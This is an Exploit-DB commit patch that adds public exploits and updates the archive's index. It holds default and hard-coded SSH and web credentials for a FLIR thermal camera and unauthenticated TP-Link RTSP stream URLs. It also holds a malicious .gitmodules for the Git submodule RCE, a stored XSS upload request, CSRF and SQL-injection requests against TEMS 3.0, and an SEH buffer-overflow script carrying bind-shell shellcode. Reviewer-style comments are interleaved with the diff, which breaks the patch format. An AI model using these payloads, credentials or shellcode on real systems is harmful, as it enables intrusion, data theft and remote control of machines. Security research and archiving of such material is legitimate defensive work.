From 635345499a9041a871062cf08676fceb65db203d Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 18 Oct 2018 05:01:46 +0000
Subject: [PATCH] DB: 2018-10-18

15 changes to exploits/shellcodes

Git Submodule - Arbitrary Code Execution
Git Submodule - Arbitrary Code Execution (PoC)
Any Sound Recorder 2.93 - Buffer Overflow (SEH)
Git Submodule - Arbitrary Code Execution
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)
Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)
Microsoft Windows Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
FLIR AX8 Thermal Camera 1.32.16 - Hard-Coded Credentials
BigTree CMS 4.2.23 - Cross-Site Scripting
Time and Expense Management System 3.0 - Cross-Site Request Forgery (Add Admin)
TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure
Time and Expense Management System 3.0 - 'table' SQL Injection
---
 exploits/hardware/remote/45629.txt      |  32 ++++++
 exploits/hardware/webapps/45632.txt     |  19 ++++
 exploits/linux/local/45631.md           |  82 ++++++++++++++
 exploits/php/webapps/45628.txt          |  40 +++++++
 exploits/php/webapps/45630.txt          |  48 ++++++++
 exploits/php/webapps/45633.txt          | 105 ++++++++++++++++++
 .../remote/42031.py                     |   4 +
 exploits/windows/remote/42315.py        |   2 +
 .../remote/41987.py                     |   0
 exploits/windows_x86-64/remote/42030.py |   4 +
 exploits/windows_x86/local/45627.py     |  63 +++++++++++
 files_exploits.csv                      |  13 ++-
 12 files changed, 409 insertions(+), 3 deletions(-)
 create mode 100644 exploits/hardware/remote/45629.txt
 create mode 100644 exploits/hardware/webapps/45632.txt
 create mode 100644 exploits/linux/local/45631.md
 create mode 100644 exploits/php/webapps/45628.txt
 create mode 100644 exploits/php/webapps/45630.txt
 create mode 100644 exploits/php/webapps/45633.txt
 rename exploits/{windows_x86-64 => windows}/remote/42031.py (96%)
 rename exploits/{windows => windows_x86-64}/remote/41987.py (100%)
 create mode 100755 exploits/windows_x86/local/45627.py
diff --git a/exploits/hardware/remote/45629.txt b/exploits/hardware/remote/45629.txt new file mode 100644 index 000000000..b9fa52f4d --- /dev/null +++ b/exploits/hardware/remote/45629.txt @@ -0,0 +1,32 @@ +# Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - Hard-Coded Credentials +# Author: Gjoko 'LiquidWorm' Krstic @zeroscience +# Date: 2018-10-14 +# Vendor: FLIR Systems, Inc +# Product web page: https://www.flir.com +# Affected version: Firmware: 1.32.16, 1.17.13, OS: neco_v1.8-0-g7ffe5b3 +# Hardware: Flir Systems Neco Board +# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14 +# References: +# Advisory ID: ZSL-2018-5494 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5494.php + +# Desc: The devices utilizes hard-coded and credentials within its Linux distribution +# image. These sets of credentials (SSH) are never exposed to the end-user and cannot +# be changed through any normal operation of the camera. Attacker could exploit this +# vulnerability by logging in using the default credentials for the web panel or gain +# shell access. + +# Hard-coded SSH access: +# ---------------------- + +fliruser:3vlig +root:hello + +# Default web creds: +# ------------------ + +admin:admin +user:user +viewer:viewer +service:??? +developer:??? \ No newline at end of file diff --git a/exploits/hardware/webapps/45632.txt b/exploits/hardware/webapps/45632.txt new file mode 100644 index 000000000..d000f5c6e --- /dev/null +++ b/exploits/hardware/webapps/45632.txt 
@@ -0,0 +1,19 @@ +# Exploit Title: TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure +# Author: Gjoko 'LiquidWorm' Krstic @zeroscience +# Date: 2018-10-17 +# Vendor: TP-LINK Technologies Co., Ltd. +# Product web page: http://www.tp-link.com +# Affected version: 1.6.18P12_121101 +# Tested on: Boa/0.94.14rc21 +# CVE: N/A +# References: +# Advisory ID: ZSL-2018-5497 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5497.php + +Desc: The TP-Link TL-SC3130 suffers from an unauthenticated and unauthorized +live RTSP stream disclosure. + +# PoC: + +http://TARGET/jpg/image.jpg +rtsp://TARGET:554/video.3gp \ No newline at end of file diff --git a/exploits/linux/local/45631.md b/exploits/linux/local/45631.md new file mode 100644 index 000000000..6491fbc86 --- /dev/null +++ b/exploits/linux/local/45631.md 
@@ -0,0 +1,82 @@ +# CVE-2018-17456 + +I've gotten a couple of questions about exploitation for the +[recent RCE](https://marc.info/?l=git&m=153875888916397&w=2) in Git. So here we +go with some technical details. + +## TL;DR + +[Here](https://github.com/joernchen/poc-submodule) is a PoC repository. +EDB Note: Mirror ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45631.zip + +## Exploitation + +The `.gitmodules` file looks as follows: + +``` +[submodule "x:x"] + path = x:x + url = -u./payload +``` + +The actual command being injected is set by the url, `-u./payload` +points the `upload-pack` flag of git clone to the `payload` shell +script. Note also the `:` within the path, this part is needed to +actually get the `payload` script executed. + +The path will end up as the repository URL in the subsequent `clone` +operation: + +``` +execve("/usr/lib/git-core/git", ["/usr/lib/git-core/git", "clone", +"--no-checkout", "--progress", "--separate-git-dir", +"/tmp/huhu/.git/modules/x:x", "-u./payload", "/tmp/huhu/x:x"],... +``` + +As the actual URL from `.gitmodules` is interpreted as the `-u` +argument. + +The colon is due to the fact, that the colon character let us go past +those lines in `transport.c`: + +```c + } else if (url_is_local_not_ssh(url) && is_file(url) && is_bundle(url, 1)) { + struct bundle_transport_data *data = xcalloc(1, sizeof(*data)); + transport_check_allowed("file"); + ret->data = data; + ret->vtable = &bundle_vtable; + ret->smart_options = NULL; +``` + +Due to `url_is_local_not_ssh` will return false due to the colon +in the path. And therefore later on in the code the smart_options +containing the `uploadpack` setting are still in place: + +```c + } else { + /* Unknown protocol in URL. Pass to external handler. 
*/ + int len = external_specification_len(url); + char *handler = xmemdupz(url, len); + transport_helper_init(ret, handler); + } + + if (ret->smart_options) { + ret->smart_options->thin = 1; + ret->smart_options->uploadpack = "git-upload-pack"; + if (remote->uploadpack) + ret->smart_options->uploadpack = remote->uploadpack; + ret->smart_options->receivepack = "git-receive-pack";1 + if (remote->receivepack) + ret->smart_options->receivepack = remote->receivepack; + } +``` + +## Further hints + +The constraint to have a colon in the `path` seems to hinder exploitation on Windows +as a colon is a forbidden character within a path on Windows. However as noted by +some people during the disclosure: Git running within the Windows Subsystem for Linux or +cygwin will allow exploitation on Windows hosts. + +Etienne Stalmans who found [a similar issue](https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/) +earlier this year managed to exploit this argument injection [using `--template`](https://twitter.com/_staaldraad/status/1049241254939246592). \ No newline at end of file diff --git a/exploits/php/webapps/45628.txt b/exploits/php/webapps/45628.txt new file mode 100644 index 000000000..752b755e1 --- /dev/null +++ b/exploits/php/webapps/45628.txt 
@@ -0,0 +1,40 @@ +# Exploit Title: BigTree CMS 4.2.23 - Cross-Site Scripting +# Date: 2018-10-15 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://www.bigtreecms.org/ +# Software Link : https://github.com/bigtreecms/BigTree-CMS/ +# Software : BigTree CMS +# Version : 4.2.23 +# Vulernability Type : Cross-site Scripting +# Vulenrability : Stored XSS +# CVE : CVE-2018-18308 + +# In the 4.2.23 version of BigTree, a Stored XSS vulnerability has been discovered +# in /admin/ajax/file-browser/upload/ (aka the image upload area). + +# HTTP POST Request : + +POST /admin/ajax/file-browser/upload/ HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://TARGET/admin/pages/add/0/ +Content-Type: multipart/form-data; boundary=---------------------------15148507251045999311737722822 +Content-Length: 1574699 +Cookie: __utma=242042641.1054742390.1539547796.1539547796.1539547796.1; __utmb=242042641.6.10.1539547796; __utmc=242042641; __utmz=242042641.1539547796.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=fat2c61gglprnotletf1mobnui; hide_bigtree_bar=; bigtree_admin[email]=test%40ismailtasdelen.me; bigtree_admin[login]=%5B%22session-5bc3a4ae5b8016.12355027%22%2C%22chain-5bc3a4ae5b7966.37991866%22%5D; bigtree_admin%5Bpage_properties_open%5D=on +Connection: close +Upgrade-Insecure-Requests: 1 + +-----------------------------15148507251045999311737722822 +Content-Disposition: form-data; name="__csrf_token_B2FHVMV815XHACWV8RVV2BTX1EH1YEH6__" + +tNvtUi8PU/IDcrgxj1t/Uv/1ciYeF7AudslXD429hkQ= +-----------------------------15148507251045999311737722822 +Content-Disposition: form-data; name="folder" + +0 +-----------------------------15148507251045999311737722822 +Content-Disposition: form-data; name="files[]"; filename="\">.jpg" 
+Content-Type: image/jpeg \ No newline at end of file diff --git a/exploits/php/webapps/45630.txt b/exploits/php/webapps/45630.txt new file mode 100644 index 000000000..0c6a9184c --- /dev/null +++ b/exploits/php/webapps/45630.txt 
@@ -0,0 +1,48 @@ +# Exploit Title: Time and Expense Management System 3.0 - Cross-Site Request Forgery (Add Admin) +# Dork: N/A +# Date: 2018-10-17 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.initechs.com/ +# Software Link: http://sourceforge.net/projects/tems/files/latest +# Version: 3.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# Description +# Normal member has all rights. + +# POC: +# 1) +# #Add,edit,delete admin+all users... +# http://localhost/[PATH]/index.php?action=ListUser +# http://localhost/[PATH]/index.php?action=BrowseUser&uid=1 +# Etc.. + +#Update admin.. +POST /[PATH]/core/controller/UpdateBORequest.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=3i34gub8ub4dk3jhjthinlv922 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 227 +action=EditUser&uid=1&fullname=Administrator_Edit&email=admin@admin.com&title=Administrator_Edit&joindate=10%2F17%2F2018&reportto=admin&usergroup=&language=ENG&dateformat=MDY&status=10&debuglevel=3&dbtracelevel=0&preview_receipt=1 +HTTP/1.1 200 OK +Date: Wed, 17 Oct 2018 00:46:35 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 10 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# /* `exploitdb`.`users` */ +# $users = array( +# array('uid' => '1','users_id' => 'admin','fullname' => 'Administrator_Edit','password' => '5ebf8364d17c8df7e4afd586c24f84a0','email' => 'admin@admin.com','joindate' => '2018-10-17','reportto' => 'admin','title' => 'Administrator_Edit','status' => 
'10','authorizations_id' => '1','usergroup' => '','dateformat' => 'MDY','language' => 'ENG','u_menu_id' => '1','lastloginat' => '2018-10-17 00:46:50','access_count' => '4','debuglevel' => '3','dbtracelevel' => '0','preview_receipt' => '1','createat' => '2018-10-17 00:26:09','createby' => '*SYSTEM','changeat' => '2018-10-17 00:47:42','changeby' => 'efe') +# ); \ No newline at end of file diff --git a/exploits/php/webapps/45633.txt b/exploits/php/webapps/45633.txt new file mode 100644 index 000000000..89b4248cb --- /dev/null +++ b/exploits/php/webapps/45633.txt 
@@ -0,0 +1,105 @@ +# Exploit Title: Time and Expense Management System 3.0 - 'table' SQL Injection +# Dork: N/A +# Date: 2018-10-17 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.initechs.com/ +# Software Link: http://sourceforge.net/projects/tems/files/latest +# Version: 3.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/core/model/GetTips.php?table=[SQL] + +# /[PATH]/core/model/GetTips.class.php +# ........ +# $hints_per_page = $_SESSION['ini']['display']['number_of_hints']; +# $userEntry=ltrim($_GET["userentry"]); +# $table = $_GET["table"]; +# $key = $_GET["field"]; +# $addlCond = $_GET["addl_cond"]; +# ........ + +GET /[PATH]/core/model/GetTips.php?table=112112+anD++EXtrACTvaLUE(112,ConcAT(0x5c,conCAT_WS(0x203a20,useR(),DAtabaSE(),VersiON()),(SeleCT+(ELT(112=112,112))),0x49687361126e2053656e6361126e))--+Efe HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Wed, 17 Oct 2018 01:02:25 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=0kunt4k4d2piurnrcle7nftln5; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 1612 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/core/model/GetTips.php?field=[SQL] + +# /[PATH]/core/model/GetTips.class.php +# ........ +# $hints_per_page = $_SESSION['ini']['display']['number_of_hints']; +# $userEntry=ltrim($_GET["userentry"]); +# $table = $_GET["table"]; +# $key = $_GET["field"]; +# $addlCond = $_GET["addl_cond"]; +# ........ 
+ +GET /[PATH]/core/model/GetTips.php?field=112112+anD++EXtrACTvaLUE(112,ConcAT(0x5c,conCAT_WS(0x203a20,useR(),DAtabaSE(),VersiON()),(SeleCT+(ELT(112=112,112))),0x49687361126e2053656e6361126e))--+Efe HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=0kunt4k4d2piurnrcle7nftln5 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Wed, 17 Oct 2018 01:09:41 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 1811 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/core/controller/UpdateBORequest.php[SQL] +# POST /action=[SQL] +# + +POST /[PATH]/core/controller/UpdateBORequest.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=3i34gub8ub4dk3jhjthinlv922 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 161 +action=EditUser' anD EXtrACTvaLUE(112,ConcAT(0x5c,conCAT(0x203a20,useR(),DAtabaSE(),VersiON()),(SeleCT (ELT(112=112,112))),0x49687361126e2053656e6361126e))-- Efe +HTTP/1.1 200 OK +Date: Wed, 17 Oct 2018 01:12:24 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 1778 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; 
charset=UTF-8 \ No newline at end of file diff --git a/exploits/windows_x86-64/remote/42031.py b/exploits/windows/remote/42031.py similarity index 96% rename from exploits/windows_x86-64/remote/42031.py rename to exploits/windows/remote/42031.py index 4a1359133..1fc2d68a9 100755 --- a/exploits/windows_x86-64/remote/42031.py +++ b/exploits/windows/remote/42031.py @@ -8,6 +8,10 @@ import socket EternalBlue exploit for Windows 7/2008 by sleepya The exploit might FAIL and CRASH a target system (depended on what is overwritten) +EDB Note: Shellcode +- x64 ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42030.asm +- x86 ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42031.asm + Tested on: - Windows 7 SP1 x64 - Windows 2008 R2 SP1 x64 diff --git a/exploits/windows/remote/42315.py b/exploits/windows/remote/42315.py index 06a619832..cbe0da6c4 100755 --- a/exploits/windows/remote/42315.py +++ b/exploits/windows/remote/42315.py @@ -9,6 +9,8 @@ import time ''' MS17-010 exploit for Windows 2000 and later by sleepya +EDB Note: mysmb.py can be found here ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py + Note: - The exploit should never crash a target (chance should be nearly 0%) - The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed diff --git a/exploits/windows/remote/41987.py b/exploits/windows_x86-64/remote/41987.py similarity index 100% rename from exploits/windows/remote/41987.py rename to exploits/windows_x86-64/remote/41987.py diff --git a/exploits/windows_x86-64/remote/42030.py b/exploits/windows_x86-64/remote/42030.py index 1eef6b52e..782455427 100755 --- a/exploits/windows_x86-64/remote/42030.py +++ b/exploits/windows_x86-64/remote/42030.py 
@@ -9,6 +9,10 @@ EternalBlue exploit for Windows 8 and 2012 by sleepya The exploit might FAIL and CRASH a target system (depended on what is overwritten) The exploit support only x64 target +EDB Note: Shellcode +- x64 ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42030.asm +- x86 ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42031.asm + Tested on: - Windows 2012 R2 x64 - Windows 8.1 x64 diff --git a/exploits/windows_x86/local/45627.py b/exploits/windows_x86/local/45627.py new file mode 100755 index 000000000..9a18b1ea0 --- /dev/null +++ b/exploits/windows_x86/local/45627.py 
@@ -0,0 +1,63 @@ +# Exploit Title: Any Sound Recorder 2.93 - Buffer Overflow (SEH) +# Exploit Author: Abdullah Alic +# Discovery Date: 2018-10-16 +# Homepage: http://www.any-sound-recorder.com +# Software Link: http://www.any-sound-recorder.com/anysoundrecorder.exe +# Version: 2.93 +# Tested on: Windows XP Professional sp3 (ENG) +# Steps to Reproduce: Run the python exploit script, it will create a new file +# with the name "boom.txt". Copy the content of the "boom.txt". +# Start Any Sound Recorder 2.93 click "Enter Key Code" Paste the content into field "User Name" click "Register" +# Connect victim machine on port 4444 + +#!/usr/bin/python + +#Payload size: 355 bytes +#msfvenom -p windows/shell_bind_tcp -b "\x00\x0a\x0d" -f python +buf = "" +buf += "\xb8\x67\x21\x25\x53\xdd\xc0\xd9\x74\x24\xf4\x5b\x31" +buf += "\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x8c\xdd\xc7" +buf += "\xa6\xae\xf6\x8a\x49\x4e\x07\xeb\xc0\xab\x36\x2b\xb6" +buf += "\xb8\x69\x9b\xbc\xec\x85\x50\x90\x04\x1d\x14\x3d\x2b" +buf += "\x96\x93\x1b\x02\x27\x8f\x58\x05\xab\xd2\x8c\xe5\x92" +buf += "\x1c\xc1\xe4\xd3\x41\x28\xb4\x8c\x0e\x9f\x28\xb8\x5b" +buf += "\x1c\xc3\xf2\x4a\x24\x30\x42\x6c\x05\xe7\xd8\x37\x85" +buf += "\x06\x0c\x4c\x8c\x10\x51\x69\x46\xab\xa1\x05\x59\x7d" +buf += "\xf8\xe6\xf6\x40\x34\x15\x06\x85\xf3\xc6\x7d\xff\x07" +buf += "\x7a\x86\xc4\x7a\xa0\x03\xde\xdd\x23\xb3\x3a\xdf\xe0" +buf += "\x22\xc9\xd3\x4d\x20\x95\xf7\x50\xe5\xae\x0c\xd8\x08" +buf += "\x60\x85\x9a\x2e\xa4\xcd\x79\x4e\xfd\xab\x2c\x6f\x1d" +buf += "\x14\x90\xd5\x56\xb9\xc5\x67\x35\xd6\x2a\x4a\xc5\x26" +buf += "\x25\xdd\xb6\x14\xea\x75\x50\x15\x63\x50\xa7\x5a\x5e" +buf += "\x24\x37\xa5\x61\x55\x1e\x62\x35\x05\x08\x43\x36\xce" +buf += "\xc8\x6c\xe3\x7b\xc0\xcb\x5c\x9e\x2d\xab\x0c\x1e\x9d" +buf += "\x44\x47\x91\xc2\x75\x68\x7b\x6b\x1d\x95\x84\x82\x82" +buf += "\x10\x62\xce\x2a\x75\x3c\x66\x89\xa2\xf5\x11\xf2\x80" +buf += "\xad\xb5\xbb\xc2\x6a\xba\x3b\xc1\xdc\x2c\xb0\x06\xd9" +buf += 
"\x4d\xc7\x02\x49\x1a\x50\xd8\x18\x69\xc0\xdd\x30\x19" +buf += "\x61\x4f\xdf\xd9\xec\x6c\x48\x8e\xb9\x43\x81\x5a\x54" +buf += "\xfd\x3b\x78\xa5\x9b\x04\x38\x72\x58\x8a\xc1\xf7\xe4" +buf += "\xa8\xd1\xc1\xe5\xf4\x85\x9d\xb3\xa2\x73\x58\x6a\x05" +buf += "\x2d\x32\xc1\xcf\xb9\xc3\x29\xd0\xbf\xcb\x67\xa6\x5f" +buf += "\x7d\xde\xff\x60\xb2\xb6\xf7\x19\xae\x26\xf7\xf0\x6a" +buf += "\x56\xb2\x58\xda\xff\x1b\x09\x5e\x62\x9c\xe4\x9d\x9b" +buf += "\x1f\x0c\x5e\x58\x3f\x65\x5b\x24\x87\x96\x11\x35\x62" +buf += "\x98\x86\x36\xa7" + +junk = 10000 +nseh= "\xeb\x06\x90\x90" # SHORT JMP 6 bytes +seh= "\x35\x2f\xd1\x72" # 0x72d12f35 : pop ebx # pop ebp # ret 0x0c FROM msacm32.drv + +buffer = "\x90" * 900 + nseh + seh + buf + "\x90" * (junk-len(buf)) +payload = buffer + +#badchars \x00 \x0a \x0d + +try: + f=open("boom.txt","w") + print "[+] Creating %s bytes payload..." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b9280f501..dbf4c5c06 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -10023,7 +10023,7 @@ id,file,description,date,author,type,platform,port 45516,exploits/linux/local/45516.c,"Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation",2018-09-26,"Qualys Corporation",local,linux, 45528,exploits/linux/local/45528.txt,"virtualenv 16.0.0 - Sandbox Escape",2018-10-04,vr_system,local,linux, 45531,exploits/windows_x86/local/45531.py,"NICO-FTP 3.0.1.19 - Buffer Overflow (SEH) (ASLR Bypass)",2018-10-04,"Miguel Mendez Z",local,windows_x86, -45548,exploits/linux/local/45548.txt,"Git Submodule - Arbitrary Code Execution",2018-10-05,"Junio C Hamano",local,linux, +45548,exploits/linux/local/45548.txt,"Git Submodule - Arbitrary Code Execution (PoC)",2018-10-05,"Junio C Hamano",local,linux, 45553,exploits/linux/local/45553.c,"Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation",2018-10-02,Lexfo,local,linux, 45560,exploits/windows/local/45560.rb,"Zahir Enterprise Plus 6 - Stack Buffer Overflow (Metasploit)",2018-10-08,Metasploit,local,windows, 45562,exploits/windows/local/45562.rb,"Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit)",2018-10-08,Metasploit,local,windows, 
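Review bot: the "(PoC)" suffix added to 45548 in this hunk reads backwards against the new 45631 row: 45548 is credited to Junio C Hamano, while 45631.md is the write-up that actually links the PoC repository (https://github.com/joernchen/poc-submodule). Suffixes that say what each entry is, for example "(Advisory)" on 45548 and "(PoC)" on 45631, would keep the two otherwise identical descriptions distinguishable in a search.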
@@ -10035,6 +10035,8 @@ id,file,description,date,author,type,platform,port 45598,exploits/windows_x86/local/45598.py,"Snes9K 0.0.9z - Buffer Overflow (SEH)",2018-10-15,"Abdullah Alıç",local,windows_x86, 45625,exploits/solaris/local/45625.rb,"Solaris - RSH Stack Clash Privilege Escalation (Metasploit)",2018-10-16,Metasploit,local,solaris, 45626,exploits/windows/local/45626.rb,"VLC Media Player - MKV Use-After-Free (Metasploit)",2018-10-16,Metasploit,local,windows, +45627,exploits/windows_x86/local/45627.py,"Any Sound Recorder 2.93 - Buffer Overflow (SEH)",2018-10-17,"Abdullah Alıç",local,windows_x86, +45631,exploits/linux/local/45631.md,"Git Submodule - Arbitrary Code Execution",2018-10-16,joernchen,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 
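Review bot: the 45627 row in this hunk is dated 2018-10-17 while the header of 45627.py says "Discovery Date: 2018-10-16"; if the date column records publication rather than discovery, that convention should be stated somewhere, otherwise the two should agree. The 45631 row also reuses the description "Git Submodule - Arbitrary Code Execution" that 45548 carried before this commit; since 45631 is the entry that links the PoC repository, a distinguishing suffix on it would keep searches unambiguous.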
@@ -16578,7 +16580,7 @@ id,file,description,date,author,type,platform,port 42587,exploits/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,remote,hardware,9251 42316,exploits/windows/remote/42316.ps1,"Skype for Business 2016 - Cross-Site Scripting",2017-07-12,nyxgeek,remote,windows, 42779,exploits/linux/remote/42779.rb,"Supervisor 3.0a1 < 3.3.2 - XML-RPC (Authenticated) Remote Code Execution (Metasploit)",2017-09-25,Metasploit,remote,linux,9001 -41987,exploits/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",remote,windows, +41987,exploits/windows_x86-64/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",remote,windows_x86-64, 42287,exploits/android/remote/42287.txt,"eVestigator Forensic PenTester - Man In The Middle Remote Code Execution",2017-06-30,intern0t,remote,android, 41718,exploits/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",remote,hardware, 41719,exploits/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,"Pedro Ribeiro",remote,hardware,80 
@@ -16618,7 +16620,7 @@ id,file,description,date,author,type,platform,port 42024,exploits/php/remote/42024.rb,"WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit)",2017-05-17,Metasploit,remote,php, 42025,exploits/php/remote/42025.rb,"BuilderEngine 3.5.0 - Arbitrary File Upload and Execution (Metasploit)",2017-05-17,Metasploit,remote,php,80 42026,exploits/xml/remote/42026.py,"Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution",2017-05-17,"Ambionics Security",remote,xml, -42031,exploits/windows_x86-64/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,remote,windows_x86-64,445 +42031,exploits/windows/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,remote,windows,445 42083,exploits/windows/remote/42083.rb,"Octopus Deploy - (Authenticated) Code Execution (Metasploit)",2017-05-29,Metasploit,remote,windows, 42084,exploits/linux/remote/42084.rb,"Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)",2017-05-29,Metasploit,remote,linux, 42041,exploits/windows/remote/42041.txt,"Secure Auditor 3.0 - Directory Traversal",2017-05-20,hyp3rlinx,remote,windows, 
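Review bot: this hunk moves 42031 to platform "windows" and drops "(x64)" from its description, which tells readers the exploit also covers x86 targets, yet the file's own "Tested on" block (see the 42031.py hunk above) still lists only Windows 7 SP1 x64 and Windows 2008 R2 SP1 x64. If x86 targets were verified, add them to "Tested on"; if not, the x64 qualifier should stay so nobody runs it against a system it was never tested on.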
